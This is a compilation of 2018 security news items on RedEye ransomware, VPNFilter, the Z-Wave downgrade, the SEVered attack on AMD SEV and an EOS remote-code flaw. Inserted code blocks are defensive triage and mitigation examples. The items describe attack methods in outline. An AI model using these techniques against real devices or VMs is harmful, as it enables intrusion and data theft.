Data Classification Firm DocAuthority Raises $10 Million
7.6.2018 securityweek IT

Israeli startup firm DocAuthority has raised $10 million in a Series A funding round led by Raine Ventures, with the participation of Greycroft, ffVC, Differential VC in the US, and 2B Angels and Plus Ventures in Israel. The funding will be used to accelerate growth and market reach.

DocAuthority brings artificial intelligence to the classification problem for unstructured data. Security and compliance require that company secrets, intellectual property and personal information be adequately secured; but business efficiency requires ready access to and use of non-confidential data. This requires accurate document classification, specifying what level of security control should be applied to different documents.

This data classification is traditionally performed manually. Applied retrospectively to existing data, it can take many months and is subject to both false positives and false negatives in the application of classification labels. If done in real time, individuals frequently tend to over-classify -- to assume a particular document is more sensitive than it actually is.

The result is often both an unnecessary burden on staff efficiency (through over-classification), and a failure to adequately protect instances of personal data (through under-classification). The need to locate and protect all instances of PII is increasingly important with the rapid growth of severe personal privacy legislation, such as GDPR.

DocAuthority's AI-based platform will scan documents and apply classification without human error, and at machine rather than human speed. "DocAuthority's revolutionary BusinessID technology," claims cofounder and CTO Ariel Peled, "is a new branch in data science, offering a novel take on AI that solves a major problem in data management and protection. With full automation and an accuracy level of 1:10,000, both business and security can agree and safely rely on policies for data classification, access management, DLP, encryption and as importantly, retention."

The funding "is an important milestone for DocAuthority," commented CEO Steve Abbott. "DocAuthority enables organizations to manage data based on both risk profile and business value, offering a common language across an organization. Assigning data management policies, based on business category, easily aligns security controls with business usage of data."

DocAuthority was founded in 2013 by Ariel Peled (CTO) and Itay Reved (VP R&D). It is based in Ra'anana, HaMerkaz, in central Israel.


'RedEye' Ransomware Destroys Files, Rewrites MBR
7.6.2018 securityweek Ransomware

A newly discovered piece of ransomware appears mainly created to destroy the victim’s files instead of encrypting and holding them for ransom.

Dubbed RedEye, the malware appears to be the creation of the developer behind the Annabelle ransomware, who also claims to have made the JigSaw ransomware that first emerged a couple of years back (Cisco says the individual might be responsible for several other families as well).

Like Annabelle and JigSaw, RedEye’s destructive nature makes it stand out in the crowd. While the vast majority of ransomware families out there have been created with the purpose of generating revenue for their authors and operators, RedEye would gladly destroy users’ files even if there’s no financial gain in it.

The new threat, Bart Blaze discovered, has a large file size, at 35.0 MB. This is the result of several media files (images and audio files) being embedded in the binary. Among these, there are three .wav files (child.wav, redeye.wav, and suicide.wav) meant to play a creepy sound, intended to scare the victim.

The malware author also used ConfuserEx and compression, along with a few other tricks, to protect the binary. A second binary was also embedded in the file, capable of replacing the MBR (Master Boot Record).

Once it has infected a computer, the ransomware performs a series of actions to make removal a difficult process. The threat disables task manager and also hides the victim machine’s drives.

RedEye then displays a ransom note informing victims that their files have been encrypted using AES256 and that they should access an .onion website and pay 0.1 Bitcoins to a specified address. This would supposedly result in a decryption key being delivered to them.

The victim is required to pay the ransom in 4 days, and the malware claims to be able to “fully destroy” the computer after that period of time is over.

Options available in the ransomware include the possibility to view encrypted files and decrypt them, get support, and “destroy PC.”

If the last option is selected, a GIF is displayed in the background, with an option to proceed with the operation (a "Do it" button) and another to close the image. If “Do it” is selected, the same as when the 4-day window is over, the malware reboots the machine and replaces the MBR.

Thus, when the victim powers on the system, they are greeted with a message informing them that “RedEye terminated their computer.” The malware author signed the message with the “iCoreX” handle.

Blaze also notes that, despite claiming to have securely encrypted files with AES256, RedEye appears to actually “overwrite or fill files with 0 bytes,” thus rendering them useless. The malware also appends the .RedEye extension to the affected files.

“While it appears that the RedEye ransomware has even more tricks up its sleeve than its predecessor Annabelle, the same conclusion holds true: do not pay the ransomware. As for the actual purpose of the ransomware: it may be considered a ransomware of the wiper kind, however, it appears the author likes to showcase his or her skill,” Blaze concludes.
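Blaze's observation that the "encrypted" files are in fact zero-filled matters for recovery, because a zero-filled file cannot be decrypted by any key. The following triage script is an added example (not Blaze's code or anything from the original write-up) that walks a directory for files carrying the .RedEye extension and classifies each as zero-filled, high-entropy (real ciphertext) or other, so an incident responder can tell wiping from encryption before anyone considers paying; the sample files it creates are constructed for the demo.

```python
import math
import os
import tempfile
from pathlib import Path
from typing import Dict

# Extension the write-up reports RedEye appending to affected files.
REDEYE_EXT = ".RedEye"


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for an empty or zero-filled buffer, close to 8.0 for ciphertext."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def classify_blob(data: bytes) -> str:
    """Classify the content of a damaged file.

    'zero_filled'  - every byte is 0x00 (wiper behaviour; there is nothing to decrypt)
    'high_entropy' - statistically looks like real ciphertext (a key would be needed)
    'other'        - partially overwritten or still structured data
    """
    if not data or all(b == 0 for b in data):
        return "zero_filled"
    if shannon_entropy(data) > 7.5:
        return "high_entropy"
    return "other"


def triage_directory(root: Path, sample_bytes: int = 65536) -> Dict[str, str]:
    """Map each *.RedEye file under root to its classification.

    Only the first sample_bytes of each file are read so large files do not stall triage.
    """
    results: Dict[str, str] = {}
    for path in root.rglob(f"*{REDEYE_EXT}"):
        if path.is_file():
            with open(path, "rb") as fh:
                results[str(path.relative_to(root))] = classify_blob(fh.read(sample_bytes))
    return results


def build_sample_tree(root: Path) -> None:
    """Constructed sample data: one zero-filled file (as Blaze describes), one random-looking file,
    and one file that was never renamed and therefore must not appear in the results."""
    (root / ("report.docx" + REDEYE_EXT)).write_bytes(b"\x00" * 4096)
    (root / ("budget.xlsx" + REDEYE_EXT)).write_bytes(os.urandom(4096))
    (root / "untouched.txt").write_bytes(b"not renamed, not scanned")


def triage_demo() -> Dict[str, str]:
    """Run the triage over a temporary tree populated by build_sample_tree()."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return triage_directory(root)


if __name__ == "__main__":
    for name, verdict in sorted(triage_demo().items()):
        print(f"{verdict:13s} {name}")
```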


FBI seizes control of a massive botnet that infected over 500,000 routers
7.6.2018 thehackernews  BotNet

Shortly after Cisco released its early report on a large-scale hacking campaign that infected over half a million routers and network storage devices worldwide, the United States government announced the takedown of a key internet domain used for the attack.
Yesterday we reported on a piece of highly sophisticated IoT botnet malware that infected over 500,000 devices in 54 countries and was likely designed by a Russia-backed state-sponsored group, possibly in an effort to cause havoc in Ukraine, according to an early report published by Cisco's Talos cyber intelligence unit on Wednesday.
Dubbed VPNFilter by the Talos researchers, the malware is a multi-stage, modular platform that targets small and home office (SOHO) routers and storage devices from Linksys, MikroTik, NETGEAR, and TP-Link, as well as network-attached storage (NAS) devices.


Meanwhile, the court documents unsealed in Pittsburgh on the same day indicate that the FBI has seized a key web domain communicating with a massive global botnet of hundreds of thousands of infected SOHO routers and other NAS devices.
The court documents said the hacking group behind the massive malware campaign is Fancy Bear, a Russian government-aligned hacking group also known as APT28, Sofacy, X-agent, Sednit, Sandworm, and Pawn Storm.
The hacking group has been in operation since at least 2007 and has been credited with a long list of attacks over the past years, including the 2016 hack of the Democratic National Committee (DNC) and Clinton Campaign to influence the U.S. presidential election.
"This operation is the first step in the disruption of a botnet that provides the Sofacy actors with an array of capabilities that could be used for a variety of malicious purposes, including intelligence gathering, theft of valuable information, destructive or disruptive attacks, and the misattribution of such activities," John Demers, the Assistant Attorney General for National Security, said in a statement.
Among other things, Talos researchers also found evidence that the VPNFilter source code shares code with versions of BlackEnergy—the malware responsible for multiple large-scale attacks targeting devices in Ukraine that the U.S. government has attributed to Russia.
VPNFilter has been designed so that it could be used to secretly conduct surveillance on its targets and gather intelligence, interfere with internet communications, monitor industrial control or SCADA systems, such as those used in electric grids, other infrastructure and factories, as well as conduct destructive cyber attack operations.


The seizure of the domain, which is part of VPNFilter's command-and-control infrastructure, allows the FBI to redirect the attempts stage one of the malware makes to reinfect the device to an FBI-controlled server, which will capture the IP addresses of infected devices and pass them on to authorities around the globe who can remove the malware.
Users of SOHO and NAS devices infected with VPNFilter are advised to reboot their devices as soon as possible, which eliminates the non-persistent second-stage malware and causes the persistent first-stage malware on the device to call out for instructions.
"Although devices will remain vulnerable to reinfection with the second stage malware while connected to the Internet, these efforts maximize opportunities to identify and remediate the infection worldwide in the time available before Sofacy actors learn of the vulnerability in their command-and-control infrastructure," the DoJ said.
Since VPNFilter does not exploit any zero-day vulnerability to infect its victims and instead searches for devices still exposed to known vulnerabilities or using default credentials, users are strongly recommended to change the default credentials on their devices to protect against the malware.
Moreover, always put your routers behind a firewall, and turn off remote administration unless you really need it.
If your router is vulnerable by default and can't be updated, it is time you bought a new one. You need to be more vigilant about the security of your smart IoT devices.


Here's How to Download All the Data Apple Collects About You
7.6.2018 thehackernews Apple

Apple is making it easier for its users to download their data the company has collected about them so far.
On Wednesday, Apple just launched a new Data and Privacy website that allows you to download everything that the company knows about you, from Apple ID info, device info, App Store activity, AppleCare history, your online shopping habits to all of your data stored in its iCloud.
A similar feature was recently offered by Facebook, enabling its users to download all of their data, not only what they have posted, but also information like facial recognition and location data, following the Cambridge Analytica scandal.
Apple has currently made this feature only available for people having accounts in European Union (along with Iceland, Liechtenstein, Norway and Switzerland), to comply with the General Data Protection Regulation (GDPR) act, which goes into effect on May 25.


However, Apple is planning to roll out this feature worldwide in the coming months. "We intend to provide these capabilities to customers around the world in the coming months," the company wrote.
The new GDPR act was passed with the aim of completely transforming the way companies handle their users' personal data, giving users more control over their data. The act applies to all companies that collect the data of EU residents, regardless of where they are based.
The GDPR will replace the British Data Protection Act 1998 from 25 May 2018.
The government has also warned businesses that if they fail to make changes in their policies before Friday, they could face fines of up to £17 Million (more than $22 Million), or 4% of their global turnover—whichever amount is higher.
That's why big companies like Apple have decided to inform their European customers about the new privacy policies.
Here's How to Download Your Data:
You can download all your data with a few simple clicks on the privacy portal.
Log in to privacy.apple.com on your Mac, PC, or iPad.
Select the Get started link under the "Obtain a copy of your data" heading in Manage your data.
You can press 'Select All' to download everything or tick the boxes of the data categories you want to download. iCloud data is listed separately, as it may be large and can take a long time to download.
Apple splits the data into chunks ranging from 1 GB up to a maximum of 25 GB, letting you select your preferred maximum file size. Select a size and hit 'Continue.'
Your download is now in progress, and Apple will send you an email when the files are available to download, which can take up to a week. Your downloaded data is then automatically deleted after 2 weeks.


Here's the List of Data that You can Download:
App Store, iTunes Store, iBooks Store and Apple Music activity
Apple ID account and device information
Apple Online Store and Retail Store activity
AppleCare support history, repair requests and more
Game Center activity
iCloud Bookmarks and Reading List
iCloud Calendars and Reminders
iCloud Contacts
iCloud Notes
Maps Report an Issue
Marketing subscriptions, downloads, and other activity
Other data
iCloud Drive files and documents
iCloud Mail
iCloud Photos
Besides the data download feature, Apple is also providing an option to permanently delete all of your data, which has been made available globally starting today. Once you initiate the deletion, the company can take up to 7 days to approve the request.
But keep in mind: Once deleted, there is no way you can retrieve your data.


Pornhub launches VPNhub – a free and unlimited VPN service
7.6.2018 thehackernews  Safety

PornHub wants you to keep your porn viewing activities private, and it is ready to help you out with its all-new VPN service.
Yes, you heard that right.
Adult entertainment giant PornHub has launched its very own VPN service today with "free and unlimited bandwidth" to help you keep prying eyes away from your browsing activity.


Dubbed VPNhub, the VPN service by PornHub is available for both mobile and desktop platforms, including Android, iOS, MacOS, and Windows.
A VPN, or Virtual Private Network, lets users transmit data anonymously, avoids ISP-level website blocking or tracking, and keeps browsing activity private by encrypting your data, even on public Wi-Fi connections.

VPNhub promises never to store, collect, sell, or share your personal information with any third parties for their marketing, advertising or research purposes.


However, in its privacy policy under the heading, "How We Use Your Information," the company says it can sell "aggregate or non-personally identifiable information with non-affiliated third parties for advertising, marketing or research purposes."
Since some governments, including that of the United Kingdom, are regulating adult content online, launching a VPN service by Pornhub makes sense.

VPNhub is available in countries across the globe except for Burma/Myanmar, Cuba, Iran, North Korea, Sudan, and Syria, due to the ban imposed by the U.S. government.
While mobile users (both iOS and Android) can download and use the VPNhub app for free, desktop users (MacOS and Windows) have to purchase a premium account.
You can also upgrade your free account to a premium subscription for $13 a month or $90 for a full year, which eliminates ads, provides faster connection speeds, and opens up "servers from a wide range of countries."
You can give premium VPNhub a try using its 7-day free trial.


Z-Wave Downgrade Attack Left Over 100 Million IoT Devices Open to Hackers
7.6.2018 thehackernews  IoT

Researchers have found that even with an advanced encryption scheme in place, more than 100 million Internet-of-Things (IoT) devices from thousands of vendors are vulnerable to a downgrade attack that could allow attackers to gain unauthorized access to your devices.
The issue resides in the implementation of the Z-Wave protocol—a wireless, radio frequency (RF) based communications technology primarily used by home automation devices to communicate with each other.
The Z-Wave protocol has been designed to offer an easy pairing process and remote control of appliances—such as lighting control, security systems, thermostats, windows, locks, swimming pools and garage door openers—over a distance of up to 100 meters (330 feet).


The latest security standard for Z-Wave, called S2 security framework, uses an advanced key exchange mechanism, i.e., Elliptic-Curve Diffie-Hellman (ECDH) anonymous key agreement protocol, to share unique network keys between the controller and the client device during the pairing process.
Even after Silicon Labs, the company that owns Z-Wave, made it mandatory for certified IoT devices to use the latest S2 security standard, millions of smart devices still support the older, insecure version of the pairing process, called the S0 framework, for compatibility.
The S0 standard was found to have a critical vulnerability in 2013 due to its use of a hardcoded encryption key (i.e. 0000000000000000) to protect the network key, allowing attackers in range of the targeted devices to intercept the communication.

After analyzing Z-Wave, security researchers from UK-based Pen Test Partners discovered that devices which support both versions of key-sharing mechanisms could be forced to downgrade the pairing process from S2 to S0.
Dubbed Z-Shave by the researchers, the downgrade attack makes it easier for an attacker in range during the pairing process to intercept the key exchange, and obtain the network key to command the device remotely.


Researchers found the vulnerability while comparing the key exchange process under S0 and S2, where they noticed that the node info command, which contains the security class, is transferred entirely unencrypted and unauthenticated, allowing attackers to intercept it or broadcast a spoofed node info command without the security class set.

The researchers—Ken Munro and Andrew Tierney—used the Conexis L1 Smart Door Lock, a flagship product of British company Yale that ships for $360, for their exploit, and were able to downgrade its security, and eventually steal the keys and get permanent access to the Yale lock, and therefore the building protected by it, all without the actual user's knowledge.
You can also watch the video of the Z-Shave attack, wherein the researchers demonstrated how an attacker could unlock a door.

The S0 decryption attack was initially revealed by cybersecurity consulting company SensePost back in 2013, but at that time, Silicon Labs didn't see this issue "as a serious threat in the real world" because it was limited to the timeframe of the pairing process.
Silicon Labs published a blog post in response to the Pen Test Partners' findings on Wednesday, saying the company is confident its smart devices are secure and not vulnerable to such threats.
"S2 is the best-in-class standard for security in the smart home today, with no known vulnerabilities, and mandatory for all new Z-Wave products submitted for certification after April 2, 2017," reads the blog post.
However, the company said that since adoption of the S2 framework across the ecosystem could not happen overnight, the issue exists in Z-Wave to provide backward compatibility, so that S2 devices can work in an S0 network (and vice versa).
The company also said there are procedures in place to notify and alert users when secure devices connect to networks using downgraded communications, but IoT device manufacturers hardly provide any user interface to show such alerts, leaving users unaware of this attack.
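Because the node info announcement is unauthenticated, a controller cannot use it alone to decide how strongly to pair; it needs an independent floor for the product and must treat anything below that floor as a downgrade to alert on. The following policy model is an added example, not Pen Test Partners' or Silicon Labs' code: `NodeInfo` is a deliberately simplified stand-in for the real announcement (not the actual Z-Wave frame encoding), and the three inclusions in `pairing_demo()` are constructed scenarios.

```python
from dataclasses import dataclass, field
from enum import IntEnum
from typing import Dict, FrozenSet, List, Optional


class SecurityClass(IntEnum):
    """Z-Wave security classes, ordered weakest to strongest (S2 has three sub-classes)."""
    NONE = 0
    S0 = 1
    S2_UNAUTHENTICATED = 2
    S2_AUTHENTICATED = 3
    S2_ACCESS_CONTROL = 4


# What a current controller supports: S2 in all sub-classes plus S0 for legacy devices.
S2_ALL = frozenset(c for c in SecurityClass if c != SecurityClass.NONE)


@dataclass(frozen=True)
class NodeInfo:
    """Constructed, simplified model of the node info announcement a joining device sends.

    The real frame travels unencrypted and unauthenticated (the Z-Shave finding), so the
    controller cannot trust 'advertised' to reflect what the device actually supports.
    """
    node_id: int
    advertised: FrozenSet[SecurityClass]


@dataclass
class PairingDecision:
    granted: Optional[SecurityClass]          # None means inclusion is refused
    alerts: List[str] = field(default_factory=list)


def select_security_class(
    info: NodeInfo,
    controller_supported: FrozenSet[SecurityClass],
    expected_minimum: SecurityClass,
    allow_s0_fallback: bool = False,
) -> PairingDecision:
    """Choose the class to pair with, refusing silent S2 -> S0 downgrades.

    expected_minimum is what the controller knows about this product independently of the
    announcement (e.g. S2_ACCESS_CONTROL for a lock certified after April 2017). An
    advertisement below that floor is treated as a downgrade attempt, not as a capability.
    """
    best = max(info.advertised & controller_supported, default=SecurityClass.NONE)
    decision = PairingDecision(granted=None)

    if best == SecurityClass.NONE:
        decision.alerts.append(f"node {info.node_id}: no common security class, inclusion refused")
        return decision
    if best < expected_minimum:
        decision.alerts.append(
            f"node {info.node_id}: advertised {best.name} but product requires "
            f"{expected_minimum.name}; possible S2->S0 downgrade, inclusion refused"
        )
        return decision
    if best == SecurityClass.S0:
        if not allow_s0_fallback:
            decision.alerts.append(
                f"node {info.node_id}: only S0 offered; S0 wraps the network key with a fixed "
                "all-zero key, inclusion refused by policy"
            )
            return decision
        # Legacy fallback permitted: pair, but surface the alert that should reach the user.
        decision.alerts.append(
            f"node {info.node_id}: included at S0 (legacy fallback); network key observable "
            "by anyone in range during this pairing"
        )
    decision.granted = best
    return decision


def pairing_demo() -> Dict[str, PairingDecision]:
    """Constructed inclusions: an honest S2 lock, a spoofed announcement for that lock, a legacy bulb."""
    lock_honest = NodeInfo(7, frozenset({SecurityClass.S0, SecurityClass.S2_ACCESS_CONTROL}))
    lock_spoofed = NodeInfo(7, frozenset({SecurityClass.S0}))   # security class stripped in transit
    legacy_bulb = NodeInfo(9, frozenset({SecurityClass.S0}))
    return {
        "lock_honest": select_security_class(lock_honest, S2_ALL, SecurityClass.S2_ACCESS_CONTROL),
        "lock_spoofed": select_security_class(lock_spoofed, S2_ALL, SecurityClass.S2_ACCESS_CONTROL),
        "legacy_bulb": select_security_class(legacy_bulb, S2_ALL, SecurityClass.S0, allow_s0_fallback=True),
    }


if __name__ == "__main__":
    for name, decision in pairing_demo().items():
        print(name, decision.granted.name if decision.granted else "REFUSED", decision.alerts)
```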


Researchers Defeat AMD's SEV Virtual Machine Encryption
7.6.2018 thehackernews  Safety

German security researchers claim to have found a new practical attack against virtual machines (VMs) protected using AMD's Secure Encrypted Virtualization (SEV) technology that could allow attackers to recover plaintext memory data from guest VMs.
AMD's Secure Encrypted Virtualization (SEV) technology, which comes with the EPYC line of processors, is a hardware feature that encrypts the memory of each VM in a way that only the guest itself can access the data, protecting it from other VMs/containers and even from an untrusted hypervisor.


Discovered by researchers from the Fraunhofer Institute for Applied and Integrated Security in Munich, the page-fault side channel attack, dubbed SEVered, takes advantage of the lack of integrity protection in the page-wise encryption of main memory, allowing a malicious hypervisor to extract the full content of main memory in plaintext from SEV-encrypted VMs.
Here's the outline of the SEVered attack, as briefed in the paper:
"While the VM’s Guest Virtual Address (GVA) to Guest Physical Address (GPA) translation is controlled by the VM itself and opaque to the HV, the HV remains responsible for the Second Level Address Translation (SLAT), meaning that it maintains the VM’s GPA to Host Physical Address (HPA) mapping in main memory.
"This enables us to change the memory layout of the VM in the HV. We use this capability to trick a service in the VM, such as a web server, into returning arbitrary pages of the VM in plaintext upon the request of a resource from outside."
"We first identify the encrypted pages in memory corresponding to the resource, which the service returns as a response to a specific request. By repeatedly sending requests for the same resource to the service while re-mapping the identified memory pages, we extract all the VM's memory in plaintext."
During their tests, the team was able to extract a test server's entire 2GB memory data, which also included data from another guest VM.
In their experimental setup, the researchers used a Linux-based system powered by an AMD Epyc 7251 processor with SEV enabled, running the Apache and Nginx web servers as well as an OpenSSH server in separate VMs.


As malicious HV, the researchers used the system's Kernel-based Virtual Machine (KVM) and modified it to observe when software within a guest accessed physical RAM.
With the Apache and Nginx web servers the extraction rate of memory data was high (79.4 KB/sec), while OpenSSH's higher response time reduced the extraction speed to only 41.6 KB/sec.
"Our evaluation shows that SEVered is feasible in practice and that it can be used to extract the entire memory from an SEV-protected VM within a reasonable time," the researchers said. "The results specifically show that critical aspects, such as noise during the identification and the resource stickiness are managed well by SEVered."
The researchers also recommended a few steps AMD could take to isolate the transition process between the host and Guest Physical Address (GPA) to mitigate the SEVered attack.
The best solution is to provide "a full-featured integrity and freshness protection of guest-pages additional to the encryption, as realized in Intel SGX. However, this likely comes with a high silicon cost to protect full VMs compared to SGX enclaves."
However, securely combining the hash of a page’s content with the guest-assigned GPA could be a low-cost, efficient solution, which ensures "pages cannot easily be swapped by changing the GPA to HPA mapping."
The research was carried out by four Fraunhofer AISEC researchers—Mathias Morbitzer, Manuel Huber, Julian Horsch and Sascha Wessel—and was published in their paper [PDF] titled "SEVered: Subverting AMD’s Virtual Machine Encryption."
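To make the remapping problem and the suggested low-cost mitigation concrete, the following toy model is an added example, not code from the Fraunhofer paper: `EncryptedMemory` stands in for SEV-protected host RAM with a hypervisor-controlled GPA-to-HPA table, the "cipher" is a hash-derived keystream tweaked by the host physical address (a simplification standing in for SEV's address-tweaked memory encryption, not AMD's actual cipher), and `page_tag()` implements the paper's proposal of binding a page's content hash to its guest-assigned GPA. `run()` serves the same resource before and after the mapping is changed, with and without the integrity tag.

```python
import hashlib
import hmac
from dataclasses import dataclass, field
from typing import Dict, Tuple, Union

PAGE = 32   # toy page size in bytes (real pages are 4 KiB)


def keystream(key: bytes, hpa: int) -> bytes:
    """Toy page cipher keystream derived from the VM key and the host physical address.

    Stands in for SEV's address-tweaked memory encryption: a page stays decryptable wherever
    the hypervisor maps it in the guest, because the tweak follows the HPA, not the GPA.
    """
    return hashlib.sha256(key + hpa.to_bytes(8, "big")).digest()[:PAGE]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def page_tag(key: bytes, gpa: int, plaintext: bytes) -> bytes:
    """Integrity tag binding page content to the guest-assigned GPA (the mitigation the paper suggests)."""
    return hmac.new(key, gpa.to_bytes(8, "big") + plaintext, "sha256").digest()


@dataclass
class EncryptedMemory:
    """Host RAM as the hypervisor sees it: ciphertext per HPA, optional tags, and the SLAT it controls."""
    key: bytes
    pages: Dict[int, bytes] = field(default_factory=dict)   # HPA -> ciphertext
    tags: Dict[int, bytes] = field(default_factory=dict)    # HPA -> integrity tag (if enabled)
    slat: Dict[int, int] = field(default_factory=dict)      # GPA -> HPA, maintained by the HV

    def store(self, gpa: int, hpa: int, plaintext: bytes, with_integrity: bool) -> None:
        assert len(plaintext) == PAGE
        self.slat[gpa] = hpa
        self.pages[hpa] = xor(plaintext, keystream(self.key, hpa))
        if with_integrity:
            self.tags[hpa] = page_tag(self.key, gpa, plaintext)

    def guest_read(self, gpa: int) -> bytes:
        """What code inside the VM sees when it reads GPA; raises if the page is not bound to this GPA."""
        hpa = self.slat[gpa]
        plaintext = xor(self.pages[hpa], keystream(self.key, hpa))
        if hpa in self.tags and not hmac.compare_digest(self.tags[hpa], page_tag(self.key, gpa, plaintext)):
            raise PermissionError(f"integrity failure: page at HPA {hpa:#x} is not bound to GPA {gpa:#x}")
        return plaintext

    def hypervisor_remap(self, gpa: int, new_hpa: int) -> None:
        """The HV edits the second-level mapping; it never handles any plaintext itself."""
        self.slat[gpa] = new_hpa


def serve_resource(mem: EncryptedMemory, resource_gpa: int) -> bytes:
    """A web server inside the VM returning the page that backs a public resource."""
    return mem.guest_read(resource_gpa)


def run(with_integrity: bool) -> Tuple[bytes, Union[bytes, str]]:
    """Return (honest response, response after the HV remaps the resource page onto another page)."""
    key = b"constructed-vm-key-for-this-demo"
    mem = EncryptedMemory(key)
    public = b"public index.html page".ljust(PAGE, b".")       # constructed page contents
    private = b"second guest: database rows".ljust(PAGE, b"#")
    mem.store(gpa=0x1000, hpa=0xA000, plaintext=public, with_integrity=with_integrity)
    mem.store(gpa=0x2000, hpa=0xB000, plaintext=private, with_integrity=with_integrity)
    first = serve_resource(mem, 0x1000)
    mem.hypervisor_remap(0x1000, 0xB000)       # SLAT now points the public resource at the private page
    try:
        second = serve_resource(mem, 0x1000)
    except PermissionError as exc:
        second = str(exc)
    return first, second


if __name__ == "__main__":
    print("without integrity:", run(False)[1])
    print("with integrity:   ", run(True)[1])
```

Without the tag the second response is the other page's plaintext, which is the SEVered leak in miniature; with the GPA-bound tag the same remap is caught at the guest's read and nothing is returned.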


Critical RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System
7.6.2018 thehackernews Vulnerebility

Security researchers have discovered a series of new vulnerabilities in the EOS blockchain platform, one of which could allow remote hackers to take complete control over the node servers running critical blockchain-based applications.
EOS is an open source smart contract platform, known as 'Blockchain 3.0,' that allows developers to build decentralized applications over blockchain infrastructure, just like Ethereum.
Discovered by Chinese security researchers at Qihoo 360—Yuki Chen of the Vulcan team and Zhiniang Peng of the Core security team—the vulnerability is a buffer out-of-bounds write issue residing in the function the node server uses to parse contracts.


To achieve remote code execution on a targeted node, all an attacker needs to do is upload a maliciously crafted WASM file (a smart contract) written in WebAssembly to the server.

As soon as the vulnerable parser reads the WASM file, the malicious payload gets executed on the node, which could then also be used to take control over the supernodes in the EOS network—servers that collect transaction information and pack it into blocks.
"With the out of bound write primitive, we can overwrite the WASM memory buffer of a WASM module instance," the duo explained in their blog post published today.
"And with the help of our malicious WASM code, we finally achieve arbitrary memory read/write in the nodeos process and bypass the common exploit mitigation techniques such as DEP/ASLR on 64-bits OS. Once successfully exploited, the exploit starts a reverse shell and connects back to the attacker."
Once the attackers gained control over the supernode, they could eventually "pack the malicious contract into the new block and further control all nodes of the EOS network."


Since the supernode system can be controlled, the researchers said the attackers can "do whatever they want," including controlling the virtual currency transactions and acquiring other financial and private data from the systems participating in the EOS network, such as a digital currency exchange, the user's key stored in the wallet, key user profiles, private data, and much more.
"What's more, the attacker can turn a node in the EOS network into a member of a botnet, launch a cyber attack or become a free 'miner' and dig up other digital currencies," the researchers told THN.
Researchers have detailed how to reproduce the vulnerability and also released a proof-of-concept exploit, along with a video demonstration, which you can watch on their blog post.
The exploit demonstrated by the 360Vulcan researchers can bypass multiple default security mitigation measures to achieve complete control over the supernode running the malicious contract.
The pair responsibly reported the vulnerability to the maintainers of the EOS project, who have already released a fix for the issue on GitHub.
"In Blockchain networks and digital currency systems, there are many attack surfaces existing in nodes, digital wallets, mining pools and smart contracts. 360 security team has previously discovered and disclosed multiple relevant high risk vulnerabilities."
The researchers believe the new type of vulnerabilities affect not only EOS alone but also other types of Blockchain platforms and virtual currency applications.


Yahoo Hacker linked to Russian Intelligence Gets 5 Years in U.S. Prison
7.6.2018 thehackernews  Crime

A 23-year-old Canadian man, who pleaded guilty last year for his role in helping Russian government spies hack into email accounts of Yahoo users and other services, has been sentenced to five years in prison.
Karim Baratov (a.k.a Karim Taloverov, a.k.a Karim Akehmet Tokbergenov), a Kazakhstan-born Canadian citizen, was also ordered on Tuesday by United States Judge Vince Chhabria to pay a fine of $250,000.
Baratov had previously admitted his role in the 2014 Yahoo data breach that compromised about 500 million Yahoo user accounts. His role was to "hack webmail accounts of individuals of interest to the FSB," Russia's spy agency.
In November, Baratov pleaded guilty to a total of nine counts, including one count of conspiring to violate the Computer Fraud and Abuse Act, and eight counts of aggravated identity theft.
According to the US Justice Department, Baratov and his co-defendant hacker Alexsey Belan worked for two agents—Dmitry Dokuchaev and Igor Sushchin—from the FSB (Federal Security Service) to compromise the accounts.
The Justice Department announced charges against all four people in March last year, which resulted in the arrest of Baratov at his home in Ancaster, near Toronto, and then his extradition to the United States.
However, Belan—who is already on the FBI's Most Wanted Hackers list—and both FSB officers currently reside in Russia, due to which they are unlikely to face the consequences for their involvement.
Baratov ran an illegal no-questions-asked hacking service from 2010 until his arrest in March 2017, in which he charged customers around $100 to obtain another person's webmail password by tricking them into entering their credentials on a fake password reset page.
According to the court documents, Baratov managed to crack more than 11,000 email accounts in both Russia as well as the United States before the Toronto Police Department caught him.
As part of his plea, Baratov admitted to hacking thousands of webmail accounts of individuals over seven years and sending those accounts' passwords to Russian spy Dokuchaev in exchange for money.
The targeted attack allowed the four to gain direct access to Yahoo's internal networks, and once in, co-defendant hacker Belan started poking around the network.
According to the FBI, Belan discovered two key assets:
Yahoo's User Database (UDB) – a database containing personal information about all Yahoo users.
The Account Management Tool – an administrative tool used to make alterations to the targeted accounts, including their passwords.
Belan then used the file transfer protocol (FTP) to download Yahoo's UDB, which included password recovery emails and cryptographic values unique to each Yahoo account, eventually enabling Belan and Baratov to access specific accounts of interest to the Russian spies.
According to Baratov's lawyers, at the time of the crime, Baratov had no idea he was working with Russian FSB agents.


Russia asks Apple to remove Telegram Messenger from the App Store
7.6.2018 thehackernews  BigBrothers

Russia's communications regulator Roskomnadzor has threatened Apple with consequences if the company does not remove the secure messaging app Telegram from its App Store.
Back in April, the Russian government banned Telegram in the country for the company's refusal to hand over private encryption keys to Russian state security services to access messages sent using the secure service.
However, so far, the Telegram app is still available in the Russian version of Apple's App Store.
So in an effort to entirely ban Telegram, state watchdog Roskomnadzor reportedly sent a legally binding letter to Apple asking it to remove the app from its Russian App Store and block it from sending push notifications to local users who have already downloaded the app.
Roskomnadzor's director Alexander Zharov said he is giving the company one month to remove the Telegram app from its App Store before the regulator enforces punishment for violations.
For those unfamiliar with the app, Telegram offers end-to-end encryption for secure messaging, so that no one, not even Telegram, can access the messages that are sent between users.
However, despite being banned in April, the majority of users in Russia are still using the app via Virtual Private Networks (VPNs), and only 15 to 30 percent of Telegram's operations in the country have been disrupted so far, Roskomnadzor announced yesterday.
This failure leads the regulator to turn to Apple for help taking the app down.
"In order to avoid possible action by Roskomnadzor for violations of the functioning of the above-mentioned Apple Inc. service, we ask you to inform us as soon as possible about your company’s further actions to resolve the problematic issue," said Roskomnadzor in the letter.
The state regulator also says it is in talks with Google to ban the Telegram app from Google Play as well.
Roskomnadzor is a federal executive body in Russia which is responsible for overseeing the media, including the electronic media, mass communications, information technology and telecommunications; organizing the work of the radio-frequency service; and overseeing compliance with the law protecting the confidentiality of its users' personal data.
